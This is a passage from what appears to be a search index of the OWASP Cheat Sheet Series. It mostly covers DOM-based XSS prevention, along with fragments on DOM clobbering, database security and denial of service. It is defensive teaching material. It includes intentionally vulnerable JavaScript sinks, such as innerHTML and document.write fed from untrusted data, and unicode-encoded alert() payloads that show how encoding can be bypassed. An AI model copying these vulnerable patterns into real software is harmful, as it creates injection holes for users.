Global variables are more prone to being overwritten by DOM Clobberng. Whenever possible, use local variables and object properties.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#12-use-unique-variable-names-in-production","title":"#12: Use Unique Variable Names In Production","text":"

Using unique variable names may help prevent naming collisions that could lead to accidental overwrites.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#13-use-object-oriented-programming-techniques-like-encapsulation","title":"#13: Use Object-oriented Programming Techniques like Encapsulation","text":"

Encapsulating variables and functions within objects or classes can help prevent them from being overwritten. By making them private, they cannot be accessed from outside the object, making them less prone to DOM Clobbering.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html","title":"DOM based XSS Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

When looking at XSS (Cross-Site Scripting), there are three generally recognized forms of XSS:

The XSS Prevention Cheatsheet does an excellent job of addressing Reflected and Stored XSS. This cheatsheet addresses DOM (Document Object Model) based XSS and is an extension (and assumes comprehension of) the XSS Prevention Cheatsheet.

In order to understand DOM based XSS, one needs to see the fundamental difference between Reflected and Stored XSS when compared to DOM based XSS. The primary difference is where the attack is injected into the application.

Reflected and Stored XSS are server side injection issues while DOM based XSS is a client (browser) side injection issue.

All of this code originates on the server, which means it is the application owner's responsibility to make it safe from XSS, regardless of the type of XSS flaw it is. Also, XSS attacks always execute in the browser.

The difference between Reflected/Stored XSS is where the attack is added or injected into the application. With Reflected/Stored the attack is injected into the application during server-side processing of requests where untrusted input is dynamically added to HTML. For DOM XSS, the attack is injected into the application during runtime in the client directly.

When a browser is rendering HTML and any other associated content like CSS or JavaScript, it identifies various rendering contexts for the different kinds of input and follows different rules for each context. A rendering context is associated with the parsing of HTML tags and their attributes.

For the purposes of this article, we refer to the HTML, HTML attribute, URL, and CSS contexts as subcontexts because each of these contexts can be reached and set within a JavaScript execution context.

In JavaScript code, the main context is JavaScript but with the right tags and context closing characters, an attacker can try to attack the other 4 contexts using equivalent JavaScript DOM methods.

The following is an example vulnerability which occurs in the JavaScript context and HTML subcontext:

 <script>\nvar x = '<%= taintedVar %>';\nvar d = document.createElement('div');\nd.innerHTML = x;\ndocument.body.appendChild(d);\n</script>\n

Let's look at the individual subcontexts of the execution context in turn.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-1-html-escape-then-javascript-escape-before-inserting-untrusted-data-into-html-subcontext-within-the-execution-context","title":"RULE #1 - HTML Escape then JavaScript Escape Before Inserting Untrusted Data into HTML Subcontext within the Execution Context","text":"

There are several methods and attributes which can be used to directly render HTML content within JavaScript. These methods constitute the HTML Subcontext within the Execution Context. If these methods are provided with untrusted input, then an XSS vulnerability could result. For example:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#example-dangerous-html-methods","title":"Example Dangerous HTML Methods","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#attributes","title":"Attributes","text":"
 element.innerHTML = \"<HTML> Tags and markup\";\nelement.outerHTML = \"<HTML> Tags and markup\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#methods","title":"Methods","text":"
 document.write(\"<HTML> Tags and markup\");\ndocument.writeln(\"<HTML> Tags and markup\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline","title":"Guideline","text":"

To make dynamic updates to HTML in the DOM safe, we recommend:

  1. HTML encoding, and then
  2. JavaScript encoding all untrusted input, as shown in these examples:
 var ESAPI = require('node-esapi');\nelement.innerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\nelement.outerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\n
 var ESAPI = require('node-esapi');\ndocument.write(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\ndocument.writeln(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-2-javascript-escape-before-inserting-untrusted-data-into-html-attribute-subcontext-within-the-execution-context","title":"RULE #2 - JavaScript Escape Before Inserting Untrusted Data into HTML Attribute Subcontext within the Execution Context","text":"

The HTML attribute subcontext within the execution context is divergent from the standard encoding rules. This is because the rule to HTML attribute encode in an HTML attribute rendering context is necessary in order to mitigate attacks which try to exit out of an HTML attributes or try to add additional attributes which could lead to XSS.

When you are in a DOM execution context you only need to JavaScript encode HTML attributes which do not execute code (attributes other than event handler, CSS, and URL attributes).

For example, the general rule is to HTML Attribute encode untrusted data (data from the database, HTTP request, user, back-end system, etc.) placed in an HTML Attribute. This is the appropriate step to take when outputting data in a rendering context, however using HTML Attribute encoding in an execution context will break the application display of data.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-but-broken-example","title":"SAFE but BROKEN example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\n// In the following line of code, companyName represents untrusted user input\n// The ESAPI.encoder().encodeForHTMLAttribute() is unnecessary and causes double-encoding\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTMLAttribute(companyName))%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

The problem is that if companyName had the value \"Johnson & Johnson\". What would be displayed in the input text field would be \"Johnson &amp; Johnson\". The appropriate encoding to use in the above case would be only JavaScript encoding to disallow an attacker from closing out the single quotes and in-lining code, or escaping to HTML and opening a new script tag.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-and-functionally-correct-example","title":"SAFE and FUNCTIONALLY CORRECT example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(companyName)%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

It is important to note that when setting an HTML attribute which does not execute code, the value is set directly within the object attribute of the HTML element so there is no concerns with injecting up.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-3-be-careful-when-inserting-untrusted-data-into-the-event-handler-and-javascript-code-subcontexts-within-an-execution-context","title":"RULE #3 - Be Careful when Inserting Untrusted Data into the Event Handler and JavaScript code Subcontexts within an Execution Context","text":"

Putting dynamic data within JavaScript code is especially dangerous because JavaScript encoding has different semantics for JavaScript encoded data when compared to other encodings. In many cases, JavaScript encoding does not stop attacks within an execution context. For example, a JavaScript encoded string will execute even though it is JavaScript encoded.

Therefore, the primary recommendation is to avoid including untrusted data in this context. If you must, the following examples describe some approaches that do and do not work.

var x = document.createElement(\"a\");\nx.href=\"#\";\n// In the line of code below, the encoded data on the right (the second argument to setAttribute)\n// is an example of untrusted data that was properly JavaScript encoded but still executes.\nx.setAttribute(\"onclick\", \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0032\\u0032\\u0029\");\nvar y = document.createTextNode(\"Click To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

The setAttribute(name_string,value_string) method is dangerous because it implicitly coerces the value_string into the DOM attribute datatype of name_string.

In the case above, the attribute name is an JavaScript event handler, so the attribute value is implicitly converted to JavaScript code and evaluated. In the case above, JavaScript encoding does not mitigate against DOM based XSS.

Other JavaScript methods which take code as a string types will have a similar problem as outline above (setTimeout, setInterval, new Function, etc.). This is in stark contrast to JavaScript encoding in the event handler attribute of a HTML tag (HTML parser) where JavaScript encoding mitigates against XSS.

<!-- Does NOT work  -->\n<a id=\"bb\" href=\"#\" onclick=\"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\"> Test Me</a>\n

An alternative to using Element.setAttribute(...) to set DOM attributes is to set the attribute directly. Directly setting event handler attributes will allow JavaScript encoding to mitigate against DOM based XSS. Please note, it is always dangerous design to put untrusted data directly into a command execution context.

<a id=\"bb\" href=\"#\"> Test Me</a>\n
//The following does NOT work because the event handler is being set to a string.\n//\"alert(7)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onclick = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0029\";\n\n//The following does NOT work because the event handler is being set to a string.\ndocument.getElementById(\"bb\").onmouseover = \"testIt\";\n\n//The following does NOT work because of the encoded \"(\" and \")\".\n//\"alert(77)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0037\\u0029;\n\n//The following does NOT work because of the encoded \";\".\n//\"testIt;testIt\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074\\u003b\\u0074\\u0065\\u0073\n\\u0074\\u0049\\u0074;\n\n//The following DOES WORK because the encoded value is a valid variable name or function reference.\n//\"testIt\" is JavaScript encoded\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074;\n\nfunction testIt() {\nalert(\"I was called.\");\n}\n

There are other places in JavaScript where JavaScript encoding is accepted as valid executable code.

 for(var \\u0062=0; \\u0062 < 10; \\u0062++){\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065\\u006c\\u006e\n(\"\\u0048\\u0065\\u006c\\u006c\\u006f\\u0020\\u0057\\u006f\\u0072\\u006c\\u0064\");\n}\n\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\n.\\u0065\\u0076\\u0061\\u006c\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065(111111111);\n

or

 var s = \"\\u0065\\u0076\\u0061\\u006c\";\nvar t = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0031\\u0029\";\nwindow[s](t);\n

Because JavaScript is based on an international standard (ECMAScript), JavaScript encoding enables the support of international characters in programming constructs and variables in addition to alternate string representations (string escapes).

However the opposite is the case with HTML encoding. HTML tag elements are well defined and do not support alternate representations of the same tag. So HTML encoding cannot be used to allow the developer to have alternate representations of the <a> tag for example.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#html-encodings-disarming-nature","title":"HTML Encoding's Disarming Nature","text":"

In general, HTML encoding serves to castrate HTML tags which are placed in HTML and HTML attribute contexts. Working example (no HTML encoding):

<a href=\"...\" >\n

Normally encoded example (Does Not Work \u2013 DNW):

&#x3c;a href=... &#x3e;\n

HTML encoded example to highlight a fundamental difference with JavaScript encoded values (DNW):

<&#x61; href=...>\n

If HTML encoding followed the same semantics as JavaScript encoding. The line above could have possibly worked to render a link. This difference makes JavaScript encoding a less viable weapon in our fight against XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-4-javascript-escape-before-inserting-untrusted-data-into-the-css-attribute-subcontext-within-the-execution-context","title":"RULE #4 - JavaScript Escape Before Inserting Untrusted Data into the CSS Attribute Subcontext within the Execution Context","text":"

Normally executing JavaScript from a CSS context required either passing javascript:attackCode() to the CSS url() method or invoking the CSS expression() method passing JavaScript code to be directly executed.

From my experience, calling the expression() function from an execution context (JavaScript) has been disabled. In order to mitigate against the CSS url() method, ensure that you are URL encoding the data passed to the CSS url() method.

var ESAPI = require('node-esapi');\ndocument.body.style.backgroundImage = \"url(<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(companyName))%>)\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-5-url-escape-then-javascript-escape-before-inserting-untrusted-data-into-url-attribute-subcontext-within-the-execution-context","title":"RULE #5 - URL Escape then JavaScript Escape Before Inserting Untrusted Data into URL Attribute Subcontext within the Execution Context","text":"

The logic which parses URLs in both execution and rendering contexts looks to be the same. Therefore there is little change in the encoding rules for URL attributes in an execution (DOM) context.

var ESAPI = require('node-esapi');\nvar x = document.createElement(\"a\");\nx.setAttribute(\"href\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(userRelativePath))%>');\nvar y = document.createTextElement(\"Click Me To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

If you utilize fully qualified URLs then this will break the links as the colon in the protocol identifier (http: or javascript:) will be URL encoded preventing the http and javascript protocols from being invoked.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-6-populate-the-dom-using-safe-javascript-functions-or-properties","title":"RULE #6 - Populate the DOM using safe JavaScript functions or properties","text":"

The most fundamental safe way to populate the DOM with untrusted data is to use the safe assignment property textContent.

Here is an example of safe usage.

<script>\nelement.textContent = untrustedData;  //does not execute code\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-7-fixing-dom-cross-site-scripting-vulnerabilities","title":"RULE #7 - Fixing DOM Cross-site Scripting Vulnerabilities","text":"

The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example if you want to use user input to write in a div tag element don't use innerHtml, instead use innerText or textContent. This will solve the problem, and it is the right way to re-mediate DOM based XSS vulnerabilities.

It is always a bad idea to use a user-controlled input in dangerous sources such as eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input.

Finally, to fix the problem in our initial code, instead of trying to encode the output correctly which is a hassle and can easily go wrong we would simply use element.textContent to write it in a content like this:

<b>Current URL:</b> <span id=\"contentholder\"></span>\n...\n<script>\ndocument.getElementById(\"contentholder\").textContent = document.baseURI;\n</script>\n

It does the same thing but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guidelines-for-developing-secure-applications-utilizing-javascript","title":"Guidelines for Developing Secure Applications Utilizing JavaScript","text":"

DOM based XSS is extremely difficult to mitigate against because of its large attack surface and lack of standardization across browsers.

The guidelines below are an attempt to provide guidelines for developers when developing Web based JavaScript applications (Web 2.0) such that they can avoid XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-1-untrusted-data-should-only-be-treated-as-displayable-text","title":"GUIDELINE #1 - Untrusted data should only be treated as displayable text","text":"

Avoid treating untrusted data as code or markup within JavaScript code.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-2-always-javascript-encode-and-delimit-untrusted-data-as-quoted-strings-when-entering-the-application-when-building-templated-javascript","title":"GUIDELINE #2 - Always JavaScript encode and delimit untrusted data as quoted strings when entering the application when building templated JavaScript","text":"

Always JavaScript encode and delimit untrusted data as quoted strings when entering the application as illustrated in the following example.

var x = \"<%= Encode.forJavaScript(untrustedData) %>\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-3-use-documentcreateelement-elementsetattributevalue-elementappendchild-and-similar-to-build-dynamic-interfaces","title":"GUIDELINE #3 - Use document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar to build dynamic interfaces","text":"

document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar are safe ways to build dynamic interfaces.

Please note, element.setAttribute is only safe for a limited number of attributes.

Dangerous attributes include any attribute that is a command execution context, such as onclick or onblur.

Examples of safe attributes includes: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-4-avoid-sending-untrusted-data-into-html-rendering-methods","title":"GUIDELINE #4 - Avoid sending untrusted data into HTML rendering methods","text":"

Avoid populating the following methods with untrusted data.

  1. element.innerHTML = \"...\";
  2. element.outerHTML = \"...\";
  3. document.write(...);
  4. document.writeln(...);
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-5-avoid-the-numerous-methods-which-implicitly-eval-data-passed-to-it","title":"GUIDELINE #5 - Avoid the numerous methods which implicitly eval() data passed to it","text":"

There are numerous methods which implicitly eval() data passed to it that must be avoided.

Make sure that any untrusted data passed to these methods is:

  1. Delimited with string delimiters
  2. Enclosed within a closure or JavaScript encoded to N-levels based on usage
  3. Wrapped in a custom function.

Ensure to follow step 3 above to make sure that the untrusted data is not sent to dangerous methods within the custom function or handle it by adding an extra layer of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#utilizing-an-enclosure-as-suggested-by-gaz","title":"Utilizing an Enclosure (as suggested by Gaz)","text":"

The example that follows illustrates using closures to avoid double JavaScript encoding.

 var ESAPI = require('node-esapi');\nsetTimeout((function(param) { return function() {\ncustomFunction(param);\n}\n})(\"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\"), y);\n

The other alternative is using N-levels of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#n-levels-of-encoding","title":"N-Levels of Encoding","text":"

If your code looked like the following, you would need to only double JavaScript encode input data.

setTimeout(\"customFunction('<%=doubleJavaScriptEncodedData%>', y)\");\nfunction customFunction (firstName, lastName)\nalert(\"Hello\" + firstName + \" \" + lastNam);\n}\n

The doubleJavaScriptEncodedData has its first layer of JavaScript encoding reversed (upon execution) in the single quotes.

Then the implicit eval of setTimeout reverses another layer of JavaScript encoding to pass the correct value to customFunction

The reason why you only need to double JavaScript encode is that the customFunction function did not itself pass the input to another method which implicitly or explicitly called eval If firstName was passed to another JavaScript method which implicitly or explicitly called eval() then <%=doubleJavaScriptEncodedData%> above would need to be changed to <%=tripleJavaScriptEncodedData%>.

An important implementation note is that if the JavaScript code tries to utilize the double or triple encoded data in string comparisons, the value may be interpreted as different values based on the number of evals() the data has passed through before being passed to the if comparison and the number of times the value was JavaScript encoded.

If A is double JavaScript encoded then the following if check will return false.

 var x = \"doubleJavaScriptEncodedA\";  //\\u005c\\u0075\\u0030\\u0030\\u0034\\u0031\nif (x == \"A\") {\nalert(\"x is A\");\n} else if (x == \"\\u0041\") {\nalert(\"This is what pops\");\n}\n

This brings up an interesting design point. Ideally, the correct way to apply encoding and avoid the problem stated above is to server-side encode for the output context where data is introduced into the application.

Then client-side encode (using a JavaScript encoding library such as node-esapi) for the individual subcontext (DOM methods) which untrusted data is passed to.

Here are some examples of how they are used:

//server-side encoding\nvar ESAPI = require('node-esapi');\nvar input = \"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\";\n
//HTML encoding is happening in JavaScript\nvar ESAPI = require('node-esapi');\ndocument.writeln(ESAPI.encoder().encodeForHTML(input));\n

One option is utilize ECMAScript 5 immutable properties in the JavaScript library. Another option provided by Gaz (Gareth) was to use a specific code construct to limit mutability with anonymous closures.

An example follows:

function escapeHTML(str) {\nstr = str + \"''\";\nvar out = \"''\";\nfor(var i=0; i<str.length; i++) {\nif(str[i] === '<') {\nout += '&lt;';\n} else if(str[i] === '>') {\nout += '&gt;';\n} else if(str[i] === \"'\") {\nout += '&#39;';\n} else if(str[i] === '\"') {\nout += '&quot;';\n} else {\nout += str[i];\n}\n}\nreturn out;\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-6-use-untrusted-data-on-only-the-right-side-of-an-expression","title":"GUIDELINE #6 - Use untrusted data on only the right side of an expression","text":"

Use untrusted data on only the right side of an expression, especially data that looks like code and may be passed to the application (e.g., location and eval()).

window[userDataOnLeftSide] = \"userDataOnRightSide\";\n

Using untrusted user data on the left side of the expression allows an attacker to subvert internal and external attributes of the window object, whereas using user input on the right side of the expression doesn't allow direct manipulation.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-7-when-url-encoding-in-dom-be-aware-of-character-set-issues","title":"GUIDELINE #7 - When URL encoding in DOM be aware of character set issues","text":"

When URL encoding in DOM be aware of character set issues as the character set in JavaScript DOM is not clearly defined (Mike Samuel).

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-8-limit-access-to-object-properties-when-using-objectx-accessors","title":"GUIDELINE #8 - Limit access to object properties when using object[x] accessors","text":"

Limit access to object properties when using object[x] accessors (Mike Samuel). In other words, add a level of indirection between untrusted input and specified object properties.

Here is an example of the problem using map types:

var myMapType = {};\nmyMapType[<%=untrustedData%>] = \"moreUntrustedData\";\n

The developer writing the code above was trying to add additional keyed elements to the myMapType object. However, this could be used by an attacker to subvert internal and external attributes of the myMapType object.

A better approach would be to use the following:

if (untrustedData === 'location') {\nmyMapType.location = \"moreUntrustedData\";\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-9-run-your-javascript-in-a-ecmascript-5-canopy-or-sandbox","title":"GUIDELINE #9 - Run your JavaScript in a ECMAScript 5 canopy or sandbox","text":"

Run your JavaScript in a ECMAScript 5 canopy or sandbox to make it harder for your JavaScript API to be compromised (Gareth Heyes and John Stevens).

Examples of some JavaScript sandbox / sanitizers:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-10-dont-eval-json-to-convert-it-to-native-javascript-objects","title":"GUIDELINE #10 - Don't eval() JSON to convert it to native JavaScript objects","text":"

Don't eval() JSON to convert it to native JavaScript objects. Instead use JSON.toJSON() and JSON.parse() (Chris Schmidt).

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#common-problems-associated-with-mitigating-dom-based-xss","title":"Common Problems Associated with Mitigating DOM Based XSS","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#complex-contexts","title":"Complex Contexts","text":"

In many cases the context isn't always straightforward to discern.

<a href=\"javascript:myFunction('<%=untrustedData%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nwindow.location = url;\n}\n</script>\n

In the above example, untrusted data started in the rendering URL context (href attribute of an a tag) then changed to a JavaScript execution context (javascript: protocol handler) which passed the untrusted data to an execution URL subcontext (window.location of myFunction).

Because the data was introduced in JavaScript code and passed to a URL subcontext the appropriate server-side encoding would be the following:

<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(untrustedData)) %>', 'test');\">\nClick Me</a>\n ...\n

Or if you were using ECMAScript 5 with an immutable JavaScript client-side encoding libraries you could do the following:

<!-- server side URL encoding has been removed.  Now only JavaScript encoding on server side. -->\n<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nvar encodedURL = ESAPI.encoder().encodeForURL(url);  //URL encoding using client-side scripts\nwindow.location = encodedURL;\n}\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#inconsistencies-of-encoding-libraries","title":"Inconsistencies of Encoding Libraries","text":"

There are a number of open source encoding libraries out there:

  1. OWASP ESAPI
  2. OWASP Java Encoder
  3. Apache Commons Text StringEscapeUtils, replace one from Apache Commons Lang3
  4. Jtidy
  5. Your company's custom implementation.

Some work on a block list while others ignore important characters like \"<\" and \">\".

Java Encoder is an active project providing supports for HTML, CSS and JavaScript encoding.

ESAPI is one of the few which works on an allow list and encodes all non-alphanumeric characters. It is important to use an encoding library that understands which characters can be used to exploit vulnerabilities in their respective contexts. Misconceptions abound related to the proper encoding that is required.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#encoding-misconceptions","title":"Encoding Misconceptions","text":"

Many security training curriculums and papers advocate the blind usage of HTML encoding to resolve XSS.

This logically seems to be prudent advice as the JavaScript parser does not understand HTML encoding.

However, if the pages returned from your web application utilize a content type of text/xhtml or the file type extension of *.xhtml then HTML encoding may not work to mitigate against XSS.

For example:

<script>\n&#x61;lert(1);\n</script>\n

The HTML encoded value above is still executable. If that isn't enough to keep in mind, you have to remember that encodings are lost when you retrieve them using the value attribute of a DOM element.

Let's look at the sample page and script:

<form name=\"myForm\" ...>\n  <input type=\"text\" name=\"lName\" value=\"<%=ESAPI.encoder().encodeForHTML(last_name)%>\">\n ...\n</form>\n<script>\nvar x = document.myForm.lName.value;  //when the value is retrieved the encoding is reversed\ndocument.writeln(x);  //any code passed into lName is now executable.\n</script>\n

Finally there is the problem that certain methods in JavaScript which are usually safe can be unsafe in certain contexts.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#usually-safe-methods","title":"Usually Safe Methods","text":"

One example of an attribute which is thought to be safe is innerText.

Some papers or guides advocate its use as an alternative to innerHTML to mitigate against XSS in innerHTML. However, depending on the tag which innerText is applied, code can be executed.

<script>\nvar tag = document.createElement(\"script\");\ntag.innerText = \"<%=untrustedData%>\";  //executes code\n</script>\n

The innerText feature was originally introduced by Internet Explorer, and was formally specified in the HTML standard in 2016 after being adopted by all major browser vendors.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#detect-dom-xss-using-variant-analysis","title":"Detect DOM XSS using variant analysis","text":"

Vulnerable code:

<script>\nvar x = location.hash.split(\"#\")[1];\ndocument.write(x);\n</script>\n

Semgrep rule to identify above dom xss link.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html","title":"Database Security Cheat Sheet","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on securely configuring and using the SQL and NoSQL databases. It is intended to be used by application developers when they are responsible for managing the databases, in the absence of a dedicated database administrator (DBA). For details about protecting against SQL Injection attacks, see the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#connecting-to-the-database","title":"Connecting to the Database","text":"

The backend database used by the application should be isolated as much as possible, in order to prevent malicious or undesirable users from being able to connect to it. Exactly how this is achieved will depend on the system and network architecture. The following options could be used to protect it:

Similar protection should be implemented to protect any web-based management tools used with the database, such as phpMyAdmin.

When an application is running on an untrusted system (such as a thick-client), it should always connect to the backend through an API that can enforce appropriate access control and restrictions. Direct connections should never be made from a thick client to the backend database.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#transport-layer-protection","title":"Transport Layer Protection","text":"

Most databases will allow unencrypted network connections in their default configurations. Although some will encrypt the initial authentication (such as Microsoft SQL Server), the rest of the traffic will be unencrypted, meaning that all kinds of sensitive information will be sent across the network in clear text. The following steps should be taken to prevent unencrypted traffic:

The Transport Layer Protection and TLS Cipher String Cheat Sheets contain further guidance on securely configuring TLS.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#authentication","title":"Authentication","text":"

The database should be configured to always require authentication, including connections from the local server. Database accounts should be:

As with any system that has its own user accounts, the usual account management processes should be followed, including:

For Microsoft SQL Server, consider the use of Windows or Integrated-Authentication, which uses existing Windows accounts rather than SQL Server accounts. This also removes the requirement to store credentials in the application, as it will connect using the credentials of the Windows user it is running under. The Windows Native Authentication Plugins provides similar functionality for MySQL.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#storing-database-credentials","title":"Storing Database Credentials","text":"

Database credentials should never be stored in the application source code, especially if they are unencrypted. Instead, they should be stored in a configuration file that:

Where possible, these credentials should also be encrypted or otherwise protected using built-in functionality, such as the web.config encryption available in ASP.NET.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#permissions","title":"Permissions","text":"

The permissions assigned to database user accounts should be based on the principle of least privilege (i.e, the accounts should only have the minimal permissions required for the application to function). This can be applied at a number of increasingly granular levels depending on the functionality available in the database. The following steps should be applicable to all environments:

For more security-critical applications, it is possible to apply permissions at more granular levels, including:

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#database-configuration-and-hardening","title":"Database Configuration and Hardening","text":"

The underlying operating system for the database server should be hardened in the same way as any other server, based on a secure baseline such as the CIS Benchmarks or the Microsoft Security Baselines.

The database application should also be properly configured and hardened. The following principles should apply to any database application and platform:

The following sections gives some further recommendations for specific database software, in addition to the more general recommendations given above.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#microsoft-sql-server","title":"Microsoft SQL Server","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mysql-and-mariadb","title":"MySQL and MariaDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#postgresql","title":"PostgreSQL","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mongodb","title":"MongoDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#redis","title":"Redis","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html","title":"Denial of Service Cheat Sheet","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This sheet is focused on providing an overall, common overview with an informative, straight to the point guidance to propose angles on how to battle denial of service (DoS) attacks on different layers. It is by no means complete, however, it should serve as an indicator to inform the reader and to introduce a workable methodology to tackle this issue.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#fundamentals","title":"Fundamentals","text":"

